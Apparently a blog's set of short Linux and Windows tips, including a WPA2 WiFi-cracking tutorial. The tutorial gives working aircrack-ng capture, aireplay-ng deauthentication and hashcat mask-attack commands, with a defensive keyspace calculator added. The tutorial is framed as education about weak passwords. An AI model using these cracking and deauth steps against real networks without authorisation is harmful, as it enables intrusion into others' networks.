How to change the web server identification string of your OpenVPN AS Server on Ubuntu 22.04

The default web server identification string that your OpenVPN Access Server sends is one way for automated scanners such as nmap to identify it.

To change it to an arbitrary value and reduce the chance of being fingerprinted by such scanners, run the following as root (or with sudo):

cd /usr/local/openvpn_as/scripts
./sacli --key "cs.web_server_name" --value "BLABLABLA" ConfigPut
./sacli start

Source: https://openvpn.net/vpn-server-resources/managing-settings-for-the-web-services-from-the-command-line/
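A verification step to go with the procedure above, added here and not part of the original post: it reads the HTTP Server header the web service returns and compares it with the value you configured. The helper names (server_header, banner_matches) and the sample responses are assumptions constructed for the example; the live check at the bottom uses curl against a URL you supply.

```shell
# Added example (not from the original post): after ConfigPut, confirm that the
# "Server:" header the OpenVPN AS web service sends really carries the new value.
# server_header and banner_matches are hypothetical helpers that work on raw
# response headers, so they can be checked offline; the live check uses curl.

# Print the Server header value from HTTP response headers read on stdin.
server_header() {
    # Header names are case-insensitive; strip the CR of CRLF line endings first.
    tr -d '\r' | awk 'tolower($1) == "server:" { sub(/^[^:]*:[ \t]*/, ""); print; exit }'
}

# Succeed only when the banner in the headers on stdin equals the expected string.
banner_matches() {
    [ "$(server_header)" = "$1" ]
}

# Constructed sample responses for offline testing (not captured from a real server).
SAMPLE_BEFORE='HTTP/1.1 200 OK
Server: OpenVPN-AS
Content-Type: text/html'
SAMPLE_AFTER='HTTP/1.1 200 OK
server: BLABLABLA
Content-Type: text/html'

# Live check, e.g.:  sh check_banner.sh https://vpn.example.com/ BLABLABLA
# -k skips certificate verification because OpenVPN AS ships a self-signed
# certificate by default; this check is only about the banner text.
if [ $# -ge 2 ]; then
    if curl -sSIk "$1" | banner_matches "$2"; then
        echo "Server header is now: $2"
    else
        echo "Server header still differs from $2: $(curl -sSIk "$1" | server_header)" >&2
        exit 1
    fi
fi
```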

That’s it, Enjoy!


How to enable/disable a network interface on Windows from command line

Assuming “Ethernet” is the name of the network connection you need to enable or disable:

To enable:

netsh interface set interface "Ethernet" enable

To disable:

netsh interface set interface "Ethernet" disable


Search for files with certain size and extension

I was looking for a large PDF file that was above 100 MB. The file was inside thousands of other files and folders, so I used this command to find it:

find . -type f -size +100M | grep -i pdf

The above simply uses the find utility, telling it to look for regular files larger than 100 MB; I then used grep to filter for PDF files. That's it!
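An added example, not from the original post, that does the same search with find's own -iname filter instead of grep: grep -i pdf matches "pdf" anywhere in the path (a directory called pdfs/ or a file mypdf.txt), while -iname '*.pdf' matches only the extension, case-insensitively. The helper names are assumptions made for the example.

```shell
# Added example (not from the original post): find_large_by_ext is a hypothetical
# helper doing what the one-liner above does, but with find's -iname filter.
# -print0 keeps file names containing spaces or newlines intact.

# Usage: find_large_by_ext DIR SIZE EXT     e.g.  find_large_by_ext . 100M pdf
# SIZE uses find's -size units: +100M means larger than 100 MiB (find rounds up).
find_large_by_ext() {
    find "$1" -type f -size "+$2" -iname "*.$3" -print0 | tr '\0' '\n'
}

# Same search, but only count the matches (one NUL per match, so odd names are safe).
count_large_by_ext() {
    find "$1" -type f -size "+$2" -iname "*.$3" -print0 | tr -dc '\000' | wc -c | tr -d ' '
}
```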

Enjoy!

Sources:
https://ostechnix.com/find-files-bigger-smaller-x-size-linux/


How to get rid of GLib-GIO-ERROR **: Settings schema ‘***’ does not contain a key on Gnome 40+

If you mess up the schema for any reason and can no longer open the Gnome settings (e.g. gnome-control-center), run the following, then log out and back in (or simply reboot):

rm ~/.config/dconf/user

That’s it! Enjoy!

Sources:

https://www.linuxuprising.com/2019/03/how-to-reset-gnome-desktop-settings-to.html


Cracking WiFi keys with Aircrack-ng and hashcat using GPU

Disclaimer

This post is for educational purposes only and should NOT be used otherwise. The primary aim is to understand how a weak WiFi password can be compromised in a few minutes, if not less.

Introduction

In this post I will explain how you can easily brute force (with a mask attack) a weak WPA2 WiFi password that consists of only 8 digits (as many people use) on a local laptop with an old GPU in a few minutes. So probably the first thing you should do after reading this (or even before) is to set a new password for your WiFi network with more than 8 characters, including numbers, a mix of upper and lower case letters, and special characters.

An Nvidia GPU is used here because of the massive parallelism it offers compared to a CPU, mainly thanks to its hundreds or thousands of CUDA cores.

Prerequisites

Software Requirements

  • Linux; I'd recommend Kali or Ubuntu, but it's totally up to you
  • Aircrack-ng to sniff the packets and record a WPA handshake
  • hashcat to brute force the password
  • hashcat-utils to convert the capture to the format hashcat expects
  • CUDA toolkit 9 or later to use the GPU's CUDA cores for cracking

Hardware Requirements

  • A WiFi card that supports monitor mode (promiscuous mode); here are some examples.
  • Any Nvidia card with CUDA 9 support

Let’s SNIFF!

Start Monitoring Mode

airmon-ng start <YOUR_WIFI_CARD_NAME_FROM_IWCONFIG>

Monitor and list all networks around you

airodump-ng <YOUR_WIFI_MONITORING_INTERFACE> # usually wlan0mon

CH 3 ][ Elapsed: 30 s ][ 2021-05-19 04:25
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:FB:5D:00:2B:E0 -87 38 1 0 8 130 WPA2 CCMP PSK MYHome
54:39:DF:7C:83:B8 -86 39 0 0 6 130 WPA2 CCMP PSK Qtel-BB1
48:F9:B3:B7:A2:64 -80 28 1 0 8 195 WPA CCMP PSK BAMB 2
D8:48:0B:54:56:0D -84 17 0 0 11 130 WPA2 CCMP PSK Qtel-BB-2
02:26:89:70:BD:1D -84 5 0 0 6 130 WPA CCMP PSK dlink

Capturing Packets

To start capturing packets from MYHome for example:

airodump-ng -c 8 --bssid E4:FB:5D:00:2B:E0 -w MYHome.out wlan0mon # wait until a full handshake occurs between a client and the network

What to do if NO handshake occurs

If no handshake occurs after waiting for some time, you can force one from another terminal (but be aware that you are moving from a passive attack to an active one, and you might get detected):

aireplay-ng -0 2 -a E4:FB:5D:00:2B:E0 wlan0mon

What to do if a handshake occurs

When you see a message in the top right that a handshake occurred, convert the .cap file to a format recognized by hashcat (using hashcat-utils, which is downloaded separately):

cap2hccapx.bin MYHome.out-01.cap MYHome.hccapx

Let’s crack it!

hashcat.bin -m 2500 -a 3 MYHome.hccapx -1 ?l?u -2 ?l?u?d ?d?d?d?d?d?d?d?d -w 3 # -w 3 pushes GPU utilization to 100%, but may freeze your screen

The above is just an example of a mask attack, which is far better than a plain brute-force attack (it is an optimized brute force). Your playground is the mask (the last positional argument, ?d?d?d?d?d?d?d?d, in the previous command), which you can consider an art, since you have to guess the shape of the password. For this article I made the whole mask digits, i.e. 8 numbers between 0 and 9.

Advanced tip: -1 and -2 (you can also use -3 and -4) define custom charsets composed from the charsets below. For example, to indicate that a character can be either a lowercase or an uppercase letter, define -1 ?l?u and then use ?1 in the mask.

This list shows all the charsets supported by hashcat at the time of writing:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

If the crack succeeds, hashcat exits with Status: Cracked and shows you the password.
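To make the mask and custom-charset rules above concrete from the defender's side, here is an added example (not from the original post) that computes how many candidates a hashcat mask covers, i.e. how large a search space a given password policy really imposes. The helper names (tokens, charset_size, charset_len, mask_keyspace) and the CS1..CS4 variables standing in for -1..-4 are assumptions made for the example; the charset sizes are taken from the list above.

```shell
# Added example (not from the original post): hypothetical keyspace calculator for
# hashcat masks, using the built-in charsets listed above plus custom charsets
# -1..-4 (supplied here as CS1..CS4). The post's 8-digit mask covers only 10^8
# candidates; 8 mixed-case alphanumerics (?2 x 8) cover 62^8, two million times more.

# Split a mask or charset definition into tokens: "?x" or one literal character.
tokens() {
    s=$1
    while [ -n "$s" ]; do
        case $s in
            '?')  printf '%s\n' '?'; s='' ;;                   # lone trailing ?
            '?'*) printf '%s\n' "${s%"${s#??}"}"; s=${s#??} ;; # ?l, ?1, ?? ...
            *)    printf '%s\n' "${s%"${s#?}"}";  s=${s#?} ;;  # literal char
        esac
    done
}

# Number of characters a token stands for; custom charsets expand recursively.
charset_size() {
    case $1 in
        '')        echo 0 ;;   '??')      echo 1 ;;    # empty definition / escaped ?
        '?l'|'?u') echo 26 ;;  '?d')      echo 10 ;;
        '?h'|'?H') echo 16 ;;  '?s')      echo 33 ;;
        '?a')      echo 95 ;;  '?b')      echo 256 ;;  # ?a = ?l?u?d?s
        '?1') charset_len "$CS1" ;;  '?2') charset_len "$CS2" ;;
        '?3') charset_len "$CS3" ;;  '?4') charset_len "$CS4" ;;
        '?'*)      echo "unknown charset $1" >&2; return 1 ;;
        *)         echo 1 ;;                           # any literal character
    esac
}

# Characters in a custom charset definition, e.g. "?l?u" -> 52.
charset_len() {
    n=0
    while IFS= read -r t; do n=$((n + $(charset_size "$t"))); done <<EOF
$(tokens "$1")
EOF
    echo "$n"
}

# Candidates a mask covers: product of token sizes (awk avoids 64-bit overflow).
mask_keyspace() {
    total=1
    while IFS= read -r t; do
        k=$(charset_size "$t") || return 1
        total=$(awk -v a="$total" -v b="$k" 'BEGIN { printf "%.0f\n", a * b }')
    done <<EOF
$(tokens "$1")
EOF
    echo "$total"
}

CS1='?l?u' CS2='?l?u?d'           # the -1 and -2 charsets from the hashcat command above
mask_keyspace '?d?d?d?d?d?d?d?d'  # 100000000
mask_keyspace '?2?2?2?2?2?2?2?2'  # 218340105584896
```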

Enjoy!

Sources
